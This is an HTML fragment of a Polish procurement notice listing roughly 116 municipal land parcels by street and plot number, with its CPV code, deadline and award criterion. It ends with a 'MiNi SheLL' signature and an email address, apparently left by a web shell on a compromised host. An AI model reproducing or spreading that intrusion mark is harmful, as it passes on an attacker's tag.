<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> zbycia i nabycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ulice: Marjańskiego obr.11 dz. nr 1690/48, 1690/49, Mazowiecka obr.11 dz. nr 1019, Antoniuk Fabryczny obr.2 dz. nr 1201/4, 1201/9, J.K. Kluka obr.15 dz. nr 20/10, Zgoda obr.14 dz. nr 1215, Bacieczki obr.4 dz. nr 97/4, Ciołkowskiego obr.18 dz. nr 1552, 1553, 1554, 1555, 1556, 1557, 1558, 1559/2, 1560/2, 1561, 1562/2, 1563/2, Tuwima obr.3 dz. nr 401/14, Drewniana obr.10 dz. nr 359/2, 341/2, Baranowicka obr.20 dz. nr 15/2, Rybnika obr.6 dz. nr 1238/2, Św. A. Boboli obr.6 dz. nr 1290, 1292, 1293, Plażowa obr.20 dz. nr 1245/23, Hetmańska obr.6 dz. nr 204/2, Szwajcarska, Portugalska obr.6 dz. nr 994, 996, 3845/54, Marczukowska obr.4 dz. nr 794/3, Leńskiego obr.15 dz. nr 862/2, Wietnamska obr.6 dz. nr 2004, Zbożowa obr.19 dz. nr 1290/2, Skalna obr.15 dz. nr 10/16, Al. Piłsudskiego obr.11 dz. nr 1288/13, Białówny obr.11 dz. nr 1340/5, M. Skłodowskiej-Curie obr.11 dz. nr 1847, Mickiewicza obr.10 dz. nr 600/3, Radzymińska obr.12 dz. nr 678, Nowogródzka obr.17 dz. nr 33/2, Warszawska obr.17 dz. nr 364/2, Spacerowa obr.17 dz. nr 1076, Pułkowa obr.16 dz. nr 1498, Lipowa obr.11 dz. nr 1652/3, Skwer Armii Krajowej obr.11 dz. nr 1468/8, Krasińskiego obr.11 dz. nr 1848/7, Bema obr.11 dz. nr 845/3, Zacisze obr.18 dz. nr 36/20, Żeleńskiego obr.15 dz. nr 378/2, Chełmońskiego obr.15 dz. nr 835, Świętojańska obr.11 dz. nr 1774/11, Sobieskiego obr.17 dz. nr 522/10, Bagnówka obr.15 dz. nr 157/2, Komarowa, NMP Królowej Rodzin obr.1 dz. nr 876, Kawaleryjska obr.9 dz. nr 772/2, Sokólska obr.12 dz. nr 559/2, Kijowska obr.11 dz. nr 490/3, Sienkiewicza obr.11 dz. nr 1417/9, Św. Rocha obr.11 dz. nr 1521/1, M. Skłodowskiej-Curie obr.11 dz. nr 1248/2, Krasnoludków obr.14 dz. nr 1655/59, Niemeńska obr.15 dz. nr 1869, Bagnówka - kolonia obr.15 dz. nr 11/23, Dźwińska obr.15 dz. nr 1876, Malachitowa obr.15 dz. nr 28/6, Prypecka obr.15 dz. nr 1998, Poleska obr.17 dz. nr 39/8, H. Kołłątaja obr.2 dz. nr 1661/14, 1685/8, 1644/7, 1685/5, Gen. A. E. Fieldorfa obr.6 dz. nr 2025, Nadbużańska obr.15 dz. nr 1579/3, Warsztatowa obr.6 dz. nr 3823, Makowa obr.16 dz. nr 632, Polska obr.6 dz. nr 560, Fredry obr.16 dz. nr 597/1, Sienkiewicza obr.17 dz. nr 342, Bema obr.8 dz. nr 156/2, Warszawska obr.17 dz. nr 1110/120, Pułkowa, Kapralska obr.16 dz. nr 1498, Pułaskiego obr.9 dz. nr 341/2, 11-go Listopada obr.11 dz. nr 1995, M. Skłodowskiej-Curie obr.11 dz. nr 1821/2, Antoniuk Fabryczny obr.2 dz. nr 695/1, 699/8, Świętojańska obr.17 dz. nr 1114/9, 1114/11, 1114/8, 1120/2, 1120/3, Malmeda obr.11 dz. nr 1397, Borsucza obr.21 dz. nr 706/2, Plażowa obr.20 dz. nr 1245/20, 1245/21, J. K. Kluka obr.15 dz. nr 140/6, I Armii Wojska Polskiego obr.12 dz. nr 461/2, obr.18 dz. nr 93/23, 93/39, 93/37, 93/31, 93/114, 106/18, 106/19, obr.11 dz. nr 104/11, Ogrodowa obr.17 dz. nr 193, obr.21 dz. nr 767/13, 771/17, 771/18, 767/10, 762/47, 762/49  - 116 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com